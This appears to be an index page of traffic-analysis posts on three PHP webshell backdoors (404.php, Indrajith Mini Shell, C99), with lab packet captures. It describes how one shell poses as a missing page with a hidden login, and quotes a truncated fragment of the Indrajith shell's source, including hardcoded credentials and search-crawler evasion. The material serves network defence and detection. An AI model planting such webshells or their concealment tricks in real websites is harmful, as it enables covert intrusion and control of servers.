404 Not Found PHP webshell backdoor Traffic Analysis, Screenshots Reverse Shell Spawn and full PCAP file download

404.php Webshell backdoor is a sneaky one, if an admin views the php page it will look as if the file is not there and benign: The secret trick to logging into the shell is hitting the tab button and a little prompt will appear where you type in your password to access the shell:   And then we login:     Here is what the network traffic it generates looks like:   017-01-20 02:34:21.437548 IP 192.168.1.102.53294 > 192.168.1.100.55555: Flags [P.], seq 703:1125, ack 1011, win 2049, length 422 E…..@…e….f…d…..w….{.P…….GET /404.php HTTP/1.1 Host: 192.168.1.100:55555 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 […]

Indrajith Mini Shell v.2.0 Traffic Analysis Python Reverse Shell Pivot Netcat Shell PCAP file download webshell backdoor

/* * Indrajith Mini Shell v.2.0 with additional features…. * originally scripted by AJITH KP * (c) Under Gnu General Public Licence 3(c) * Team Open Fire and Indishell Family * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John. * Indishell : ASHELL, D@rkwolf. * THA : THA RUDE [There is Nothing in Borders] * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Computer Korner Friends. */ /*—————— LOGIN ——————-*/ $username=”admin”; $password=”password”; $email=”blah@gmail.com”; /*—————— Login Data End ———-*/ @error_reporting(4); /*—————— Anti Crawler ————*/ if(!empty($_SERVER[‘HTTP_USER_AGENT’])) { $userAgents = array(“Google”, “Slurp”, “MSNBot”, “ia_archiver”, “Yandex”, […]

C99 Webshell Backdoor SpYshell v.KingDefacer Traffic Analysis PCAP file download screenshots

The C99 webshell usage, PCAP and screenshots of what it looks like, this has been one of the most commonly used webshells over the years. 2017-01-20 03:22:24.448614 IP 192.168.1.102.54057 > 192.168.1.100.55555: Flags [P.], seq 1:404, ack 1, win 2053, length 403 E…..@…Z|…f…d.)…..#.A..P…;…GET /c99.php?c99shcook[login]=0 HTTP/1.1 Host: 192.168.1.100:55555 Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate, sdch Accept-Language: en-US,en;q=0.8 2017-01-20 03:22:24.448633 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [.], ack 404, win 237, length 0 E..(/.@.@……d…f…).A….  .P….5.. 2017-01-20 03:22:24.449057 IP 192.168.1.100.55555 > 192.168.1.102.54057: Flags [P.], seq 1:327, ack 404, win 237, […]